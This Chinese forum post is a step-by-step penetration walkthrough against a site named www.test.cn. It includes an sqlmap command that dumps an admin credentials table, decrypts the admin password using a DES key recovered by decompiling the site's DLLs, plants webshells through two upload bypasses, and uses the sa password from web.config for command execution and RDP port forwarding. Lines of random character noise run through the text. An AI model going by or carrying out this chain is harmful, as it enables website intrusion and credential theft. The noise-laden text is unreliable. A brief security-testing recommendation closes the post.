|
( V$ H! ]1 Y$ H
注:各位同仁,今天晚上主要防止被限号来凑个数字,这篇文章本来是给一个机构做科普的,所以写的有点怎么说,反正土司的人看了会骂哈哈,大家凑合的看,文中哪怕有那么一点半点东西,能给大家带来启发,那么我这个文章就没白发,所以大佬们轻点喷哈哈,嘴下留情哈哈。 1、POST注入猜解网站管理员账号密码 通过awvs扫描发现存在注入,直接在avws下的Scans---target下点击你扫描的过目标如图:
1 @' U( x1 B1 x* | : n, L, {4 B( S. I
# d* y' M8 E. r8 l( `
3 G4 p$ u: w5 C1 [
( T k8 Z- L' g
1 s$ y- c! c* J. R+ ^' H3 [4 H 然后点vulnerabilities,如图:9 S) [* {! G: G
8 B8 u8 M5 K1 R/ k
/ d5 F! w# t. ~8 l2 y" { 
. y$ `, B `: G4 {6 ^ . c% W; ~' k& @+ S; y3 E; o
. Y, n7 `5 }! Z4 d: w 点SQL injection会看到HTTPS REQUESTS,如图:
/ `6 J& S3 s8 s6 a. L8 I
% A6 O) I9 o4 E, h+ T2 w% G6 D" S+ a4 o( D6 o1 B+ ~
9 \. Z% S$ A8 r, p
0 \6 H3 F' b3 O$ T) L3 A( C" ~: c) t5 ]
获取到http的数据包,如下: POST /Product/ProductHandler.ashx HTTP/1.1 Host: www.test.cn Cache-Control: no-cache Accept: text/plain, /; q=0.01 Origin: http://www.test.cn User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://www.test.cn/ Accept-Language: en-us,en;q=0.5 X-Scanner: Netsparker Accept-Encoding: gzip, deflate Content-Length: 157 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
* [. r9 m7 Q* i# ~1 p2 `8 Y( Y6 i 3 a5 R9 a; @8 P& `4 u
+ w6 {9 |' \) l' f& [
Type=GetProductList&pageIndex=3&pageSize=5&productType=*&supplierType=1 把以上post包保存到sqlmap根目录下,保存为1.txt,注入参数提前用awvs已经识别,注入参数是productType,注入命令为: sqlmap.py -r 1.txt --level 5 --risk 3 -p productType --dbms=mssql -D cci -T Zy_user -C u_loginname,u_loginpassword –dump 此sqlmap命令的意思是读取数据库cci下Zy_user表的用户名密码列名,dump就是保存下来的意思,会保存在./sqlmap/output下,以excel表格的格式保存着下载下来的表的内容。 注入用户名密码加密值如图:# L. {+ h% C& f. `* X- m! _
8 p# M5 W4 P) R
2 m& ?, p1 o, f9 Y- K$ j- c 
; R- F9 j3 L; ?( _
2 I. l! L' s! q2 u
2 [; A/ i! k% e" H5 Z 2、通过对bin目录dll进行反编译解密管理员加密值登录后台 通过前面的sql注入可获取网站后台账号和密码加密值,为了更深入的测试网站后台是否存在其他漏洞,需要黑盒测试模拟黑客攻击进一步测试,故对网站目录bin目录下的dll进行反编译来获取加密密匙,最终成功解密密码。 把bin目录下的dll全部加载到Reflector中,然后通过跟踪常用用户密码相关的类函数,得出如下结果:
. Q! L( ^* [, h
% z; E% A% |# A. Q/ C' M8 j+ N c. c7 P _# i& N, n. `4 i
 : k" G' P* c3 J7 d R2 B
/ c$ W1 A4 h O8 h0 w6 _6 O* T9 ]
( c. J2 E0 y7 U* Y  ( K) u$ ~" g3 U7 {
: ^, b0 l; }, l `6 g3 @
: Y! c/ Z# G) H3 v# d9 r 得知密钥是fkue且为des加密,接着定位encrypt类函数找出其解密方式如图:
/ d. A2 f2 b7 W8 b2 u2 X
/ H+ k6 J8 x, c7 ~6 N) P Y4 L3 b* ~) {: F
& H6 H8 m, Q, ?1 E! M4 g1 j) Q/ G , P. x/ r, }5 f% i6 G/ z v
' ]3 x5 k7 ~4 c* i' i
解密方式是把fkue使用md5进行加密,然后取32位md5加密值的前8位作为加密密钥,如图:
7 s* f0 z; Z; l7 ?2 e5 | 4 a" s! Y! o$ D9 }/ ^
8 s( h5 Z# S- ]  - m" `$ t- I+ Q+ M+ z
/ i1 b3 o5 E6 U7 i$ c/ H
, b/ |4 M$ ?3 H. b! I+ g$ @2 g
通过在线解密网站解密得知加密密钥就是:1110AF03。 前面sql注入步骤已经成功获取admin的加密值,如图:
* y4 k# d1 ^& Q
8 p. z3 @" v2 W4 ^0 ^* M! L. f
4 W' `9 d! j- y% u' D K  " S( f1 a8 C3 o1 N- f7 @
3 x9 M7 }; D- Z% n
" X4 }& P' a! @' P) _/ `$ v$ m3 T0 F 解密admin管理员密码如图:7 r. o( a6 U3 C( T0 }9 r
" @. `" U: I& o' T
0 q9 y9 f& d' ?+ j3 F  * P( Q# `5 V- W9 S% N' y
/ V6 l" H" D. i0 h
" D4 g, {- k3 [ 然后用自己写了个解密工具,解密结果和在线网站一致
; V1 J3 G9 ~# b% b3 t 7 h- f4 Z( s7 `; E8 T( j& _
- } C* `( r( X0 z
1 C7 ^7 `% n! X) j$ a4 Y! b. C) b
8 t: V. K3 B! n! }5 j5 x% E! G
) ^( K; m, _3 {9 c* C9 G 解密后的密码为:123mhg,./,登陆如图:7 W1 h, O4 D: B) [
; P2 `; E# @4 q! z9 N' l( x9 f
8 i8 o" \9 z( k( ?1 t/ ~& K
 ?- N8 }( S( I6 `/ o% g0 M
8 ?7 u+ [9 p; P1 c$ M1 E
* h; C- `1 }1 X' Q. X4 M! R% _
3、后台上传绕过漏洞getwebshell如图: 登陆后台后,在添加信息处,会有上传图片的功能,随后使用burpsuite抓包如下图:
8 P* W9 h1 I& [( Y: K R) }# s
7 [$ _% E8 u ~ j8 c- X$ S
4 ^+ P% _' ^8 \7 r3 \1 k1 Q  . w$ H& G; `" [7 @
9 w2 c1 K, `- N; S$ n" W. R1 Q {0 o9 L" g, |7 [7 m/ |( K' J
+ t. O3 P |( K: J2 C
4 E. e: Y1 J& C- \1 V# `6 Z" _0 e c6 ^
绕过上传限制,只需要把包里的filename的1.jpg改为1.aspx,即可成功上传webshell,如下图:3 v7 n/ q$ g" ]' B! U
+ C# T4 M: u5 w
- b3 u9 a# L5 l0 [% f) _  ) S5 s* ~5 M* u; ]9 |2 b; U. d
) L, y7 y4 D2 W4 T
# A( X9 I; M0 P4 p
访问webshell如下图:! U$ N3 J) t' p0 J# s% b* I9 |
" l' N6 e& S: G. [5 d+ A3 k
( E) @) D: j& n& A) \, A2 X4 L  " B' f2 Z- {& n* `1 U
" D, v; `* P8 m4 g
6 o" u1 f5 `/ Y$ T) E2 [; r1 ?
4、前台任意上传漏洞getwebshell 在目标站前台有注册账号功能,注册成功后,同样在上传图片处可直接上传webshell,链接为http://www.test.cn/userRegister.aspx,登录如图:% M, x0 C' y" G( j: R% V
) m2 ^( W5 L& x; c: @1 f8 F6 I3 j* k+ o" s6 f5 a
7 ?! o$ M* E4 B* T1 P9 s ! D# u6 L: S% M: N1 @, e
; l7 b) w1 T/ q- B. M
在上传证件或者头像的处可直接上传aspx 后缀的webshell,上传成功后,点右键-属性,可查看上传后的webshell路径为:http://www.test.cn/Admin/upload/demo.aspx 然后登录如图:
% T1 H" X% |+ M
6 `2 y2 H1 ^$ i9 U7 ~: t+ ] {2 n& G) E4 }1 a: G$ I
 : d0 i# e5 w; _$ M
- p/ d O$ X% B- @8 K ?
o7 J$ U. W3 \& t# P& I' |# M 通过查看网站路径下的web.config文件得到mssql数据库配置账号为sa的密码并且以windows身份认证配置的系统登录账号密码如图:
2 T K, Y. }% n8 x
0 y5 Q1 G' _9 ~; Q! X2 d' y( \4 j2 d0 y; M9 U
 5 ~6 |. i* Q2 L( Y
' x3 R) @2 _* J. Y* m
; C5 l4 F" X6 t+ }3 g7 H4 k# E
可直接利用mssql sa权限执行系统命令添加管理员账号密码或者直接利用Windows登录密码webshell下利用lcx内网端口转发登陆3389。
: R# `' ^2 ]# w0 s9 r) t, |8 j
- t$ b/ o) c; q0 n
( V0 C% _+ G: [3 U8 t9 W2 _0 W 总结:一套程序不应该只考虑其美观与功能强大,是要在满足安全的前提下再同时满足美观与功能。建议各个单位在系统上线之前,条件允许的情况下,首先进行白盒测试,其次进行黑盒测试,再次进行灰盒测试。如果通过白、黑、灰发现安全问题,那么就要再进行一轮这样的测试,直到系统难以被发现安全问题,然后再进行上线。特别是一些政府、企事业单位,数据面涉及基础人口等敏感数据,一旦遭到黑客攻击被泄露,给国家带来的损失是无法挽回的。好了以上就是今天分享的渗透内容,谢谢大家的收看!- @4 v G% A( X, _% r6 q* e
2 A+ u8 P& A1 M4 z, h
1 E, q6 }1 s0 v$ I$ ~
/ S: \: Y! L6 ?5 E$ F$ B
% Z9 U# I, j! ^ | 
发表于 2023-11-28 20:23:22
收藏
支持
反对